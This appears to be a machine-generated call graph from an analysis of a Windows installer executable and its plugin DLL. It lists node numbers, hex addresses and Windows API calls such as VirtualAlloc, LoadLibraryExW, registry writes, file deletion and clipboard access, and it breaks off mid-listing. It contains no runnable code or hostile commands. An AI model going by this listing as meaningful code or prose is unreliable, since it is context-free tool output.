4993->4990 4994->4989 4220 10002739 4221 10002789 4220->4221 4222 10002749 VirtualProtect 4220->4222 4222->4221 4995 1000103d 4996 1000101b 8 API calls 4995->4996 4997 10001056 4996->4997 4998 4014ff 4999 401507 4998->4999 5001 40151a 4998->5001 5000 402ab3 18 API calls 4999->5000 5000->5001 5002 401000 5003 401037 BeginPaint GetClientRect 5002->5003 5004 40100c DefWindowProcW 5002->5004 5006 4010f3 5003->5006 5007 401179 5004->5007 5008 401073 CreateBrushIndirect FillRect DeleteObject 5006->5008 5009 4010fc 5006->5009 5008->5006 5010 401102 CreateFontIndirectW 5009->5010 5011 401167 EndPaint 5009->5011 5010->5011 5012 401112 6 API calls 5010->5012 5011->5007 5012->5011 5013 401a00 5014 402ad0 18 API calls 5013->5014 5015 401a09 ExpandEnvironmentStringsW 5014->5015 5016 401a1d 5015->5016 5018 401a30 5015->5018 5017 401a22 lstrcmpW 5016->5017 5016->5018 5017->5018 5019 401b01 5020 402ad0 18 API calls 5019->5020 5021 401b08 5020->5021 5022 402ab3 18 API calls 5021->5022 5023 401b11 wsprintfW 5022->5023 5024 40295d 5023->5024 5025 402706 5026 402ad0 18 API calls 5025->5026 5027 40270d FindFirstFileW 5026->5027 5028 402720 5027->5028 5029 402735 5027->5029 5031 40273e 5029->5031 5033 405c8d wsprintfW 5029->5033 5034 405d46 lstrcpynW 5031->5034 5033->5031 5034->5028 5035 401f08 5036 402ad0 18 API calls 5035->5036 5037 401f0f 5036->5037 5038 401f36 GlobalAlloc 5037->5038 5039 401f8c 5037->5039 5038->5039 5040 401f4a 5038->5040 5040->5039 5044 405c8d wsprintfW 5040->5044 5042 401f7e 5045 405c8d wsprintfW 5042->5045 5044->5042 5045->5039 5046 100018ca 5047 10001243 3 API calls 5046->5047 5048 100018f0 5047->5048 5049 10001243 3 API calls 5048->5049 5050 100018f8 5049->5050 5051 10001243 3 API calls 5050->5051 5054 1000193a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5050->5054 5052 1000191f 5051->5052 5053 10001928 GlobalFree 5052->5053 5053->5054 5055 10001280 2 API calls 5054->5055 5056 10001ab6 GlobalFree GlobalFree 5055->5056 5057 401c8e 5058 402ab3 18 API calls 5057->5058 5059 401c94 IsWindow 5058->5059 5060 4019f0 5059->5060 3879 40268f 3880 402696 3879->3880 3883 402908 3879->3883 3881 402ab3 18 API calls 3880->3881 3882 4026a1 3881->3882 3884 4026a8 SetFilePointer 3882->3884 3884->3883 3885 4026b8 3884->3885 3887 405c8d wsprintfW 3885->3887 3887->3883 5061 401491 5062 404ffa 25 API calls 5061->5062 5063 401498 5062->5063 4016 402293 4017 402ad0 18 API calls 4016->4017 4018 4022a2 4017->4018 4019 402ad0 18 API calls 4018->4019 4020 4022ab 4019->4020 4021 402ad0 18 API calls 4020->4021 4022 4022b5 GetPrivateProfileStringW 4021->4022 5064 402c15 5065 402c40 5064->5065 5066 402c27 SetTimer 5064->5066 5067 402c95 5065->5067 5068 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5065->5068 5066->5065 5068->5067 5069 100016d7 5070 10001706 5069->5070 5071 10001b47 23 API calls 5070->5071 5072 1000170d 5071->5072 5073 10001720 5072->5073 5074 10001714 5072->5074 5075 10001747 5073->5075 5076 1000172a 5073->5076 5077 10001280 2 API calls 5074->5077 5079 10001771 5075->5079 5080 1000174d 5075->5080 5078 10001555 3 API calls 5076->5078 5081 1000171e 5077->5081 5083 1000172f 5078->5083 5082 10001555 3 API calls 5079->5082 5084 100015d5 3 API calls 5080->5084 5082->5081 5085 100015d5 3 API calls 5083->5085 5086 10001752 5084->5086 5087 10001735 5085->5087 5088 10001280 2 API calls 5086->5088 5089 10001280 2 API calls 5087->5089 5090 10001758 GlobalFree 5088->5090 5091 1000173b GlobalFree 5089->5091 5090->5081 5092 1000176c GlobalFree 5090->5092 5091->5081 5092->5081 4028 401f98 4029 40205c 4028->4029 4030 401faa 4028->4030 4033 401423 25 API calls 4029->4033 4031 402ad0 18 API calls 4030->4031 4032 401fb1 4031->4032 4034 402ad0 18 API calls 4032->4034 4038 402195 4033->4038 4035 401fba 4034->4035 4036 401fd0 LoadLibraryExW 4035->4036 4037 401fc2 GetModuleHandleW 4035->4037 4036->4029 4039 401fe1 4036->4039 4037->4036 4037->4039 4051 40611c WideCharToMultiByte 4039->4051 4042 401ff2 4044 402011 4042->4044 4045 401ffa 4042->4045 4043 40202b 4046 404ffa 25 API calls 4043->4046 4054 1000177a 4044->4054 4047 401423 25 API calls 4045->4047 4048 402002 4046->4048 4047->4048 4048->4038 4049 40204e FreeLibrary 4048->4049 4049->4038 4052 406146 GetProcAddress 4051->4052 4053 401fec 4051->4053 4052->4053 4053->4042 4053->4043 4055 100017aa 4054->4055 4096 10001b47 4055->4096 4057 100017b1 4058 100018c7 4057->4058 4059 100017c2 4057->4059 4060 100017c9 4057->4060 4058->4048 4145 10002244 4059->4145 4127 1000228e 4060->4127 4065 100017ee 4066 1000182d 4065->4066 4067 1000180f 4065->4067 4072 10001833 4066->4072 4073 1000186f 4066->4073 4158 10002430 4067->4158 4068 100017f8 4068->4065 4155 10002acf 4068->4155 4069 100017df 4071 100017e5 4069->4071 4077 100017f0 4069->4077 4071->4065 4139 10002814 4071->4139 4079 100015d5 3 API calls 4072->4079 4075 10002430 11 API calls 4073->4075 4084 10001861 4075->4084 4149 100025b7 4077->4149 4082 10001849 4079->4082 4083 10002430 11 API calls 4082->4083 4083->4084 4087 100018b6 4084->4087 4182 100023f3 4084->4182 4086 100017f6 4086->4065 4087->4058 4089 100018c0 GlobalFree 4087->4089 4089->4058 4093 100018a2 4093->4087 4186 10001555 wsprintfW 4093->4186 4094 1000189b FreeLibrary 4094->4093 4189 1000121b GlobalAlloc 4096->4189 4098 10001b6b 4190 1000121b GlobalAlloc 4098->4190 4100 10001b76 4191 10001243 4100->4191 4102 10001d8a GlobalFree GlobalFree GlobalFree 4103 10001da7 4102->4103 4106 10001df1 4102->4106 4104 100020f9 4103->4104 4103->4106 4113 10001dbc 4103->4113 4104->4106 4107 1000211a GetModuleHandleW 4104->4107 4105 10001c31 GlobalAlloc 4117 10001b7e 4105->4117 4106->4057 4108 1000212b LoadLibraryW 4107->4108 4109 1000213c 4107->4109 4108->4106 4108->4109 4202 10001620 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4109->4202 4110 10001c80 lstrcpyW 4114 10001c8a lstrcpyW 4110->4114 4111 10001ca5 GlobalFree 4111->4117 4113->4106 4198 1000122c 4113->4198 4114->4117 4115 1000214e 4115->4106 4116 1000215f lstrlenW 4115->4116 4203 10001620 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4116->4203 4117->4102 4117->4105 4117->4110 4117->4111 4117->4114 4122 1000209b lstrcpyW 4117->4122 4123 10001f40 GlobalFree 4117->4123 4125 1000122c 2 API calls 4117->4125 4126 10001ce7 4117->4126 4201 1000121b GlobalAlloc 4117->4201 4120 10002179 4120->4106 4122->4117 4123->4117 4125->4117 4126->4117 4196 100015b0 GlobalSize GlobalAlloc 4126->4196 4132 100022a6 4127->4132 4128 10001243 3 API calls 4128->4132 4130 100023bc GlobalFree 4131 100017cf 4130->4131 4130->4132 4131->4065 4131->4068 4131->4069 4132->4128 4132->4130 4133 10002378 GlobalAlloc WideCharToMultiByte 4132->4133 4134 1000122c GlobalAlloc lstrcpynW 4132->4134 4135 10002351 GlobalAlloc 4132->4135 4136 10002333 lstrlenW 4132->4136 4206 100012c8 4132->4206 4133->4130 4134->4132 4137 1000233e 4135->4137 4136->4130 4136->4137 4137->4130 4211 1000254b 4137->4211 4141 10002826 4139->4141 4140 100028cb VirtualAlloc 4142 100028e9 4140->4142 4141->4140 4143 100029e5 4142->4143 4144 100029da GetLastError 4142->4144 4143->4065 4144->4143 4146 10002254 4145->4146 4147 100017c8 4145->4147 4146->4147 4148 10002266 GlobalAlloc 4146->4148 4147->4060 4148->4146 4153 100025d3 4149->4153 4150 10002624 GlobalAlloc 4154 10002646 4150->4154 4151 10002637 4152 1000263c GlobalSize 4151->4152 4151->4154 4152->4154 4153->4150 4153->4151 4154->4086 4156 10002ada 4155->4156 4157 10002b1a GlobalFree 4156->4157 4164 10002450 4158->4164 4160 100024e3 lstrcpyW 4160->4164 4161 1000247e wsprintfW 4161->4164 4162 10002504 GlobalFree 4162->4164 4163 100024b1 MultiByteToWideChar 4163->4164 4164->4160 4164->4161 4164->4162 4164->4163 4165 1000252d GlobalFree 4164->4165 4167 100024a0 lstrcpynW 4164->4167 4168 1000248f StringFromGUID2 4164->4168 4169 10001280 2 API calls 4164->4169 4214 1000121b GlobalAlloc 4164->4214 4215 100012f3 4164->4215 4165->4164 4166 10001815 4165->4166 4171 100015d5 4166->4171 4167->4164 4168->4164 4169->4164 4219 1000121b GlobalAlloc 4171->4219 4173 100015db 4174 100015e8 lstrcpyW 4173->4174 4175 10001602 4173->4175 4177 1000161c 4174->4177 4175->4177 4178 10001607 wsprintfW 4175->4178 4179 10001280 4177->4179 4178->4177 4180 100012c3 GlobalFree 4179->4180 4181 10001289 GlobalAlloc lstrcpynW 4179->4181 4180->4084 4181->4180 4183 10002401 4182->4183 4184 10001882 4182->4184 4183->4184 4185 1000241d GlobalFree 4183->4185 4184->4093 4184->4094 4185->4183 4187 10001280 2 API calls 4186->4187 4188 1000157f 4187->4188 4188->4087 4189->4098 4190->4100 4192 1000127c 4191->4192 4193 1000124d 4191->4193 4192->4117 4193->4192 4204 1000121b GlobalAlloc 4193->4204 4195 10001259 lstrcpyW GlobalFree 4195->4117 4197 100015ce 4196->4197 4197->4126 4205 1000121b GlobalAlloc 4198->4205 4200 1000123b lstrcpynW 4200->4106 4201->4117 4202->4115 4203->4120 4204->4195 4205->4200 4207 100012d0 4206->4207 4208 100012ee 4206->4208 4207->4208 4209 1000122c 2 API calls 4207->4209 4208->4208 4210 100012ec 4209->4210 4210->4132 4212 10002559 VirtualAlloc 4211->4212 4213 100025af 4211->4213 4212->4213 4213->4137 4214->4164 4216 10001324 4215->4216 4217 100012fc 4215->4217 4216->4164 4217->4216 4218 10001308 lstrcpyW 4217->4218 4218->4216 4219->4173 5093 10001058 5094 10001243 3 API calls 5093->5094 5096 10001074 5094->5096 5095 100010dd 5096->5095 5097 10001092 5096->5097 5098 1000152e 4 API calls 5096->5098 5099 1000152e 4 API calls 5097->5099 5098->5097 5100 100010a2 5099->5100 5101 100010b2 5100->5101 5102 100010a9 GlobalSize 5100->5102 5103 100010b6 GlobalAlloc 5101->5103 5104 100010c7 5101->5104 5102->5101 5105 10001555 3 API calls 5103->5105 5106 100010d2 GlobalFree 5104->5106 5105->5104 5106->5095 5107 401718 5108 402ad0 18 API calls 5107->5108 5109 40171f SearchPathW 5108->5109 5110 40173a 5109->5110 5111 40159b 5112 402ad0 18 API calls 5111->5112 5113 4015a2 SetFileAttributesW 5112->5113 5114 4015b4 5113->5114 4615 40219e 4616 402ad0 18 API calls 4615->4616 4617 4021a4 4616->4617 4618 402ad0 18 API calls 4617->4618 4619 4021ad 4618->4619 4620 402ad0 18 API calls 4619->4620 4621 4021b6 4620->4621 4622 406089 2 API calls 4621->4622 4623 4021bf 4622->4623 4624 4021d0 lstrlenW lstrlenW 4623->4624 4628 4021c3 4623->4628 4626 404ffa 25 API calls 4624->4626 4625 404ffa 25 API calls 4629 4021cb 4625->4629 4627 40220e SHFileOperationW 4626->4627 4627->4628 4627->4629 4628->4625 4628->4629 5115 40149e 5116 40223c 5115->5116 5117 4014ac PostQuitMessage 5115->5117 5117->5116 5118 100010e1 5119 10001111 5118->5119 5120 10001243 3 API calls 5119->5120 5130 10001121 5120->5130 5121 100011d8 GlobalFree 5122 100012c8 2 API calls 5122->5130 5123 100011d3 5123->5121 5124 10001243 3 API calls 5124->5130 5125 10001280 2 API calls 5128 100011c4 GlobalFree 5125->5128 5126 10001164 GlobalAlloc 5126->5130 5127 100011f8 GlobalFree 5127->5130 5128->5130 5129 100012f3 lstrcpyW 5129->5130 5130->5121 5130->5122 5130->5123 5130->5124 5130->5125 5130->5126 5130->5127 5130->5128 5130->5129 3594 401b22 3595 401b73 3594->3595 3596 401b2f 3594->3596 3598 401b78 3595->3598 3599 401b9d GlobalAlloc 3595->3599 3597 401bb8 3596->3597 3602 401b46 3596->3602 3600 405d68 18 API calls 3597->3600 3608 40223c 3597->3608 3598->3608 3633 405d46 lstrcpynW 3598->3633 3613 405d68 3599->3613 3604 402236 3600->3604 3631 405d46 lstrcpynW 3602->3631 3634 405529 3604->3634 3606 401b8a GlobalFree 3606->3608 3609 401b55 3632 405d46 lstrcpynW 3609->3632 3611 401b64 3638 405d46 lstrcpynW 3611->3638 3626 405d75 3613->3626 3614 405fc0 3615 405fd6 3614->3615 3655 405d46 lstrcpynW 3614->3655 3615->3597 3617 405e28 GetVersion 3617->3626 3618 405f8e lstrlenW 3618->3626 3621 405d68 10 API calls 3621->3618 3622 405ea3 GetSystemDirectoryW 3622->3626 3624 405eb6 GetWindowsDirectoryW 3624->3626 3626->3614 3626->3617 3626->3618 3626->3621 3626->3622 3626->3624 3627 405eea SHGetSpecialFolderLocation 3626->3627 3628 405d68 10 API calls 3626->3628 3629 405f2f lstrcatW 3626->3629 3639 405c13 RegOpenKeyExW 3626->3639 3644 405fda 3626->3644 3653 405c8d wsprintfW 3626->3653 3654 405d46 lstrcpynW 3626->3654 3627->3626 3630 405f02 SHGetPathFromIDListW CoTaskMemFree 3627->3630 3628->3626 3629->3626 3630->3626 3631->3609 3632->3611 3633->3606 3637 40553e 3634->3637 3635 40558a 3635->3608 3636 405552 MessageBoxIndirectW 3636->3635 3637->3635 3637->3636 3638->3608 3640 405c87 3639->3640 3641 405c47 RegQueryValueExW 3639->3641 3640->3626 3642 405c68 RegCloseKey 3641->3642 3642->3640 3650 405fe7 3644->3650 3645 40605d 3646 406062 CharPrevW 3645->3646 3649 406083 3645->3649 3646->3645 3647 406050 CharNextW 3647->3645 3647->3650 3649->3626 3650->3645 3650->3647 3651 40603c CharNextW 3650->3651 3652 40604b CharNextW 3650->3652 3656 4057db 3650->3656 3651->3650 3652->3647 3653->3626 3654->3626 3655->3615 3657 4057e1 3656->3657 3658 4057f7 3657->3658 3659 4057e8 CharNextW 3657->3659 3658->3650 3659->3657 5131 402222 5132 402229 5131->5132 5135 40223c 5131->5135 5133 405d68 18 API calls 5132->5133 5134 402236 5133->5134 5136 405529 MessageBoxIndirectW 5134->5136 5136->5135 3660 401924 3661 401926 3660->3661 3666 402ad0 3661->3666 3667 402adc 3666->3667 3668 405d68 18 API calls 3667->3668 3669 402afd 3668->3669 3670 40192b 3669->3670 3671 405fda 5 API calls 3669->3671 3672 4055d5 3670->3672 3671->3670 3713 4058b6 3672->3713 3675 4055fd DeleteFileW 3682 401934 3675->3682 3676 405755 3676->3682 3757 406089 FindFirstFileW 3676->3757 3677 405614 3677->3676 3727 405d46 lstrcpynW 3677->3727 3679 40563a 3680 405640 lstrcatW 3679->3680 3681 40564d 3679->3681 3684 405653 3680->3684 3728 4057fa lstrlenW 3681->3728 3687 405663 lstrcatW 3684->3687 3688 405659 3684->3688 3690 40566e lstrlenW FindFirstFileW 3687->3690 3688->3687 3688->3690 3689 405773 3760 4057ae lstrlenW CharPrevW 3689->3760 3692 40574a 3690->3692 3711 405691 3690->3711 3692->3676 3694 4057db CharNextW 3694->3711 3695 40558d 5 API calls 3696 405785 3695->3696 3697 405789 3696->3697 3698 40579f 3696->3698 3697->3682 3703 404ffa 25 API calls 3697->3703 3701 404ffa 25 API calls 3698->3701 3699 405729 FindNextFileW 3702 405741 FindClose 3699->3702 3699->3711 3701->3682 3702->3692 3704 405796 3703->3704 3705 405be0 40 API calls 3704->3705 3708 40579d 3705->3708 3707 4055d5 64 API calls 3707->3711 3708->3682 3709 404ffa 25 API calls 3709->3699 3711->3694 3711->3699 3711->3707 3711->3709 3732 405d46 lstrcpynW 3711->3732 3733 40558d 3711->3733 3741 404ffa 3711->3741 3752 405be0 3711->3752 3763 405d46 lstrcpynW 3713->3763 3715 4058c7 3764 405859 CharNextW CharNextW 3715->3764 3718 4055f5 3718->3675 3718->3677 3719 405fda 5 API calls 3725 4058dd 3719->3725 3720 40590e lstrlenW 3721 405919 3720->3721 3720->3725 3723 4057ae 3 API calls 3721->3723 3722 406089 2 API calls 3722->3725 3724 40591e GetFileAttributesW 3723->3724 3724->3718 3725->3718 3725->3720 3725->3722 3726 4057fa 2 API calls 3725->3726 3726->3720 3727->3679 3729 405808 3728->3729 3730 40581a 3729->3730 3731 40580e CharPrevW 3729->3731 3730->3684 3731->3729 3731->3730 3732->3711 3770 4059aa GetFileAttributesW 3733->3770 3736 4055ba 3736->3711 3737 4055b0 DeleteFileW 3739 4055b6 3737->3739 3738 4055a8 RemoveDirectoryW 3738->3739 3739->3736 3740 4055c6 SetFileAttributesW 3739->3740 3740->3736 3742 405015 3741->3742 3751 4050b7 3741->3751 3743 405031 lstrlenW 3742->3743 3744 405d68 18 API calls 3742->3744 3745 40505a 3743->3745 3746 40503f lstrlenW 3743->3746 3744->3743 3748 405060 SetWindowTextW 3745->3748 3749 40506d 3745->3749 3747 405051 lstrcatW 3746->3747 3746->3751 3747->3745 3748->3749 3750 405073 SendMessageW SendMessageW SendMessageW 3749->3750 3749->3751 3750->3751 3751->3711 3773 4060b0 GetModuleHandleA 3752->3773 3756 405c08 3756->3711 3758 40576f 3757->3758 3759 40609f FindClose 3757->3759 3758->3682 3758->3689 3759->3758 3761 405779 3760->3761 3762 4057ca lstrcatW 3760->3762 3761->3695 3762->3761 3763->3715 3765 405876 3764->3765 3768 405888 3764->3768 3767 405883 CharNextW 3765->3767 3765->3768 3766 4058ac 3766->3718 3766->3719 3767->3766 3768->3766 3769 4057db CharNextW 3768->3769 3769->3768 3771 405599 3770->3771 3772 4059bc SetFileAttributesW 3770->3772 3771->3736 3771->3737 3771->3738 3772->3771 3774 4060d7 GetProcAddress 3773->3774 3775 4060cc LoadLibraryA 3773->3775 3776 405be7 3774->3776 3775->3774 3775->3776 3776->3756 3777 405a52 lstrcpyW 3776->3777 3778 405aa1 GetShortPathNameW 3777->3778 3779 405a7b 3777->3779 3781 405ab6 3778->3781 3782 405bda 3778->3782 3801 4059cf GetFileAttributesW CreateFileW 3779->3801 3781->3782 3784 405abe wsprintfA 3781->3784 3782->3756 3783 405a85 CloseHandle GetShortPathNameW 3783->3782 3785 405a99 3783->3785 3786 405d68 18 API calls 3784->3786 3785->3778 3785->3782 3787 405ae6 3786->3787 3802 4059cf GetFileAttributesW CreateFileW 3787->3802 3789 405af3 3789->3782 3790 405b02 GetFileSize GlobalAlloc 3789->3790 3791 405bd3 CloseHandle 3790->3791 3792 405b24 ReadFile 3790->3792 3791->3782 3792->3791 3793 405b3c 3792->3793 3793->3791 3803 405934 lstrlenA 3793->3803 3796 405b55 lstrcpyA 3799 405b77 3796->3799 3797 405b69 3798 405934 4 API calls 3797->3798 3798->3799 3800 405bae SetFilePointer WriteFile GlobalFree 3799->3800 3800->3791 3801->3783 3802->3789 3804 405975 lstrlenA 3803->3804 3805 40597d 3804->3805 3806 40594e lstrcmpiA 3804->3806 3805->3796 3805->3797 3806->3805 3807 40596c CharNextA 3806->3807 3807->3804 5137 4040a9 lstrcpynW lstrlenW 5138 401cab 5139 402ab3 18 API calls 5138->5139 5140 401cb2 5139->5140 5141 402ab3 18 API calls 5140->5141 5142 401cba GetDlgItem 5141->5142 5143 4024e6 5142->5143 3838 40232f 3839 402335 3838->3839 3840 402ad0 18 API calls 3839->3840 3841 402347 3840->3841 3842 402ad0 18 API calls 3841->3842 3843 402351 RegCreateKeyExW 3842->3843 3844 40237b 3843->3844 3845 402729 3843->3845 3846 402ad0 18 API calls 3844->3846 3848 402396 3844->3848 3849 40238c lstrlenW 3846->3849 3847 4023a2 3851 4023bd RegSetValueExW 3847->3851 3855 402f38 3847->3855 3848->3847 3850 402ab3 18 API calls 3848->3850 3849->3848 3850->3847 3853 4023d3 RegCloseKey 3851->3853 3853->3845 3857 402f53 3855->3857 3856 402f80 3876 403160 ReadFile 3856->3876 3857->3856 3878 403192 SetFilePointer 3857->3878 3861 4030f6 3863 4030fa 3861->3863 3864 403112 3861->3864 3862 402f9d GetTickCount 3865 402fea 3862->3865 3869 4030e1 3862->3869 3867 403160 ReadFile 3863->3867 3868 403160 ReadFile 3864->3868 3864->3869 3870 40312d WriteFile 3864->3870 3866 403160 ReadFile 3865->3866 3865->3869 3872 403040 GetTickCount 3865->3872 3873 403065 MulDiv wsprintfW 3865->3873 3874 4030a9 WriteFile 3865->3874 3866->3865 3867->3869 3868->3864 3869->3851 3870->3869 3871 403141 3870->3871 3871->3864 3871->3869 3872->3865 3875 404ffa 25 API calls 3873->3875 3874->3865 3874->3869 3875->3865 3877 402f8b 3876->3877 3877->3861 3877->3862 3877->3869 3878->3856 5144 4016af 5145 402ad0 18 API calls 5144->5145 5146 4016b5 GetFullPathNameW 5145->5146 5149 4016cf 5146->5149 5153 4016f1 5146->5153 5147 401706 GetShortPathNameW 5148 40295d 5147->5148 5150 406089 2 API calls 5149->5150 5149->5153 5151 4016e1 5150->5151 5151->5153 5154 405d46 lstrcpynW 5151->5154 5153->5147 5153->5148 5154->5153 5155 100029ef 5156 10002a07 5155->5156 5157 100015b0 2 API calls 5156->5157 5158 10002a22 5157->5158 5159 100021ef 5160 10002254 5159->5160 5161 1000228a 5159->5161 5160->5161 5162 10002266 GlobalAlloc 5160->5162 5162->5160 5163 404430 5164 40445c 5163->5164 5165 40446d 5163->5165 5224 40550d GetDlgItemTextW 5164->5224 5166 404479 GetDlgItem 5165->5166 5173 4044d8 5165->5173 5168 40448d 5166->5168 5172 4044a1 SetWindowTextW 5168->5172 5176 405859 4 API calls 5168->5176 5169 4045bc 5222 40475d 5169->5222 5226 40550d GetDlgItemTextW 5169->5226 5170 404467 5171 405fda 5 API calls 5170->5171 5171->5165 5177 403f95 19 API calls 5172->5177 5173->5169 5178 405d68 18 API calls 5173->5178 5173->5222 5175 403ffc 8 API calls 5180 404771 5175->5180 5181 404497 5176->5181 5182 4044bd 5177->5182 5183 40454c SHBrowseForFolderW 5178->5183 5179 4045ec 5184 4058b6 18 API calls 5179->5184 5181->5172 5188 4057ae 3 API calls 5181->5188 5185 403f95 19 API calls 5182->5185 5183->5169 5186 404564 CoTaskMemFree 5183->5186 5187 4045f2 5184->5187 5189 4044cb 5185->5189 5190 4057ae 3 API calls 5186->5190 5227 405d46 lstrcpynW 5187->5227 5188->5172 5225 403fca SendMessageW 5189->5225 5193 404571 5190->5193 5195 4045a8 SetDlgItemTextW 5193->5195 5199 405d68 18 API calls 5193->5199 5194 4044d1 5197 4060b0 3 API calls 5194->5197 5195->5169 5196 404609 5198 4060b0 3 API calls 5196->5198 5197->5173 5206 404611 5198->5206 5200 404590 lstrcmpiW 5199->5200 5200->5195 5202 4045a1 lstrcatW 5200->5202 5201 404650 5228 405d46 lstrcpynW 5201->5228 5202->5195 5204 404657 5205 405859 4 API calls 5204->5205 5207 40465d GetDiskFreeSpaceW 5205->5207 5206->5201 5210 4057fa 2 API calls 5206->5210 5211 4046a2 5206->5211 5209 404680 MulDiv 5207->5209 5207->5211 5209->5211 5210->5206 5212 4047de 21 API calls 5211->5212 5221 40470c 5211->5221 5213 4046fe 5212->5213 5216 404703 5213->5216 5217 40470e SetDlgItemTextW 5213->5217 5214 40140b 2 API calls 5215 40472f 5214->5215 5229 403fb7 KiUserCallbackDispatcher 5215->5229 5219 4047de 21 API calls 5216->5219 5217->5221 5219->5221 5220 40474b 5220->5222 5230 4043c5 5220->5230 5221->5214 5221->5215 5222->5175 5224->5170 5225->5194 5226->5179 5227->5196 5228->5204 5229->5220 5231 4043d3 5230->5231 5232 4043d8 SendMessageW 5230->5232 5231->5232 5232->5222 5233 10001670 5234 1000152e 4 API calls 5233->5234 5236 10001688 5234->5236 5235 100016ce GlobalFree 5236->5235 5237 100016a3 5236->5237 5238 100016ba VirtualFree 5236->5238 5237->5235 5238->5235 5239 404132 5240 40414a 5239->5240 5244 404264 5239->5244 5245 403f95 19 API calls 5240->5245 5241 4042ce 5242 4043a0 5241->5242 5243 4042d8 GetDlgItem 5241->5243 5249 403ffc 8 API calls 5242->5249 5246 404361 5243->5246 5250 4042f2 5243->5250 5244->5241 5244->5242 5247 40429f GetDlgItem SendMessageW 5244->5247 5248 4041b1 5245->5248 5246->5242 5251 404373 5246->5251 5270 403fb7 KiUserCallbackDispatcher 5247->5270 5253 403f95 19 API calls 5248->5253 5254 40439b 5249->5254 5250->5246 5255 404318 6 API calls 5250->5255 5256 404389 5251->5256 5257 404379 SendMessageW 5251->5257 5259 4041be CheckDlgButton 5253->5259 5255->5246 5256->5254 5260 40438f SendMessageW 5256->5260 5257->5256 5258 4042c9 5261 4043c5 SendMessageW 5258->5261 5268 403fb7 KiUserCallbackDispatcher 5259->5268 5260->5254 5261->5241 5263 4041dc GetDlgItem 5269 403fca SendMessageW 5263->5269 5265 4041f2 SendMessageW 5266 404218 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5265->5266 5267 40420f GetSysColor 5265->5267 5266->5254 5267->5266 5268->5263 5269->5265 5270->5258 5271 402938 SendMessageW 5272 402952 InvalidateRect 5271->5272 5273 40295d 5271->5273 5272->5273 5274 4014b8 5275 4014be 5274->5275 5276 401389 2 API calls 5275->5276 5277 4014c6 5276->5277 4223 405139 4224 4052e5 4223->4224 4225 40515a GetDlgItem GetDlgItem GetDlgItem 4223->4225 4227 405316 4224->4227 4228 4052ee GetDlgItem CreateThread CloseHandle 4224->4228 4270 403fca SendMessageW 4225->4270 4230 405341 4227->4230 4231 405363 4227->4231 4232 40532d ShowWindow ShowWindow 4227->4232 4228->4227 4293 4050cd OleInitialize 4228->4293 4229 4051cb 4235 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4229->4235 4233 40534a 4230->4233 4234 40539f 4230->4234 4279 403ffc 4231->4279 4275 403fca SendMessageW 4232->4275 4237 405352 4233->4237 4238 405378 ShowWindow 4233->4238 4234->4231 4245 4053aa SendMessageW 4234->4245 4243 405241 4235->4243 4244 405225 SendMessageW SendMessageW 4235->4244 4276 403f6e 4237->4276 4241 405398 4238->4241 4242 40538a 4238->4242 4240 405371 4248 403f6e SendMessageW 4241->4248 4247 404ffa 25 API calls 4242->4247 4249 405254 4243->4249 4250 405246 SendMessageW 4243->4250 4244->4243 4245->4240 4251 4053c3 CreatePopupMenu 4245->4251 4247->4241 4248->4234 4271 403f95 4249->4271 4250->4249 4252 405d68 18 API calls 4251->4252 4254 4053d3 AppendMenuW 4252->4254 4256 4053e6 GetWindowRect 4254->4256 4257 4053f9 4254->4257 4255 405264 4258 4052a1 GetDlgItem SendMessageW 4255->4258 4259 40526d ShowWindow 4255->4259 4261 405402 TrackPopupMenu 4256->4261 4257->4261 4258->4240 4260 4052c8 SendMessageW SendMessageW 4258->4260 4262 405290 4259->4262 4263 405283 ShowWindow 4259->4263 4260->4240 4261->4240 4264 405420 4261->4264 4274 403fca SendMessageW 4262->4274 4263->4262 4265 40543c SendMessageW 4264->4265 4265->4265 4267 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4265->4267 4268 40547e SendMessageW 4267->4268 4268->4268 4269 4054a7 GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4240 4270->4229 4272 405d68 18 API calls 4271->4272 4273 403fa0 SetDlgItemTextW 4272->4273 4273->4255 4274->4258 4275->4230 4277 403f75 4276->4277 4278 403f7b SendMessageW 4276->4278 4277->4278 4278->4231 4280 404014 GetWindowLongW 4279->4280 4290 40409d 4279->4290 4281 404025 4280->4281 4280->4290 4282 404034 GetSysColor 4281->4282 4283 404037 4281->4283 4282->4283 4284 404047 SetBkMode 4283->4284 4285 40403d SetTextColor 4283->4285 4286 404065 4284->4286 4287 40405f GetSysColor 4284->4287 4285->4284 4288 404076 4286->4288 4289 40406c SetBkColor 4286->4289 4287->4286 4288->4290 4291 404090 CreateBrushIndirect 4288->4291 4292 404089 DeleteObject 4288->4292 4289->4288 4290->4240 4291->4290 4292->4291 4300 403fe1 4293->4300 4295 4050f0 4299 405117 4295->4299 4303 401389 4295->4303 4296 403fe1 SendMessageW 4297 405129 OleUninitialize 4296->4297 4299->4296 4301 403ff9 4300->4301 4302 403fea SendMessageW 4300->4302 4301->4295 4302->4301 4305 401390 4303->4305 4304 4013fe 4304->4295 4305->4304 4306 4013cb MulDiv SendMessageW 4305->4306 4306->4305 4307 4015b9 4308 402ad0 18 API calls 4307->4308 4309 4015c0 4308->4309 4310 405859 4 API calls 4309->4310 4320 4015c9 4310->4320 4311 401614 4313 401646 4311->4313 4314 401619 4311->4314 4312 4057db CharNextW 4315 4015d7 CreateDirectoryW 4312->4315 4319 401423 25 API calls 4313->4319 4316 401423 25 API calls 4314->4316 4317 4015ed GetLastError 4315->4317 4315->4320 4318 401620 4316->4318 4317->4320 4321 4015fa GetFileAttributesW 4317->4321 4325 405d46 lstrcpynW 4318->4325 4324 40163e 4319->4324 4320->4311 4320->4312 4321->4320 4323 40162d SetCurrentDirectoryW 4323->4324 4325->4323 5278 401939 5279 402ad0 18 API calls 5278->5279 5280 401940 lstrlenW 5279->5280 5281 4024e6 5280->5281 4542 403abd 4543 403c10 4542->4543 4544 403ad5 4542->4544 4546 403c21 GetDlgItem GetDlgItem 4543->4546 4547 403c61 4543->4547 4544->4543 4545 403ae1 4544->4545 4548 403aec SetWindowPos 4545->4548 4549 403aff 4545->4549 4550 403f95 19 API calls 4546->4550 4551 403cbb 4547->4551 4559 401389 2 API calls 4547->4559 4548->4549 4552 403b04 